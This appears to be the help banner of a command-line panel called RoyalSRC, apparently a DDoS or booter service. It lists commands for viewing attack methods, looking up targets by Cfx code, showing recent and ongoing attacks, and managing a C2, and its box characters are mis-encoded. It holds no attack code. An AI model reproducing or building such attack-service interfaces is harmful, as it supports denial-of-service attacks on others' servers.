<<clear()>>
<<full_screen_custom(59x18)>>
[97mâ”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
[97mâ”‚ [38;5;196mCLEAR     [97mâ”‚ [38;5;045mClear the terminal screen.               [97mâ”‚
[97mâ”‚ [38;5;196mHELP      [97mâ”‚ [38;5;045mView this exact banner.                  [97mâ”‚
[97mâ”‚ [38;5;196mMETHODS   [97mâ”‚ [38;5;045mView the methods list.                   [97mâ”‚
[97mâ”‚ [38;5;196mPLAN      [97mâ”‚ [38;5;045mView your plan details.                  [97mâ”‚
[97mâ”‚ [38;5;196mGRAPH     [97mâ”‚ [38;5;045mView a graph details.                    [97mâ”‚
[97mâ”‚ [38;5;196mLOOKUP    [97mâ”‚ [38;5;045mLookup a target, Cfx code.               [97mâ”‚
[97mâ”‚ [38;5;196mRECENT    [97mâ”‚ [38;5;045mView your last attacks.                  [97mâ”‚
[97mâ”‚ [38;5;196mPASSWD    [97mâ”‚ [38;5;045mChange your password on the RoyalSRC.    [97mâ”‚
[97mâ”‚ [38;5;196mTHEMES    [97mâ”‚ [38;5;045mChange the appearance of the RoyalSRC.   [97mâ”‚
[97mâ”‚ [38;5;196mONGOING   [97mâ”‚ [38;5;045mView ongoing attacks in the RoyalSRC.    [97mâ”‚
[97mâ”‚ [38;5;196mC2        [97mâ”‚ [38;5;045mView the command for manage You'r C2.    [97mâ”‚
[97mâ”‚ [38;5;196mCREDITS   [97mâ”‚ [38;5;045mView credits for RoyalSRC.               [97mâ”‚
[97mâ”‚ [38;5;196mCOMMANDS  [97mâ”‚ [38;5;045mView Royal SRC commands list.            [97mâ”‚
[97mâ””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜
Â·Â·Â·
Â·Â·Â·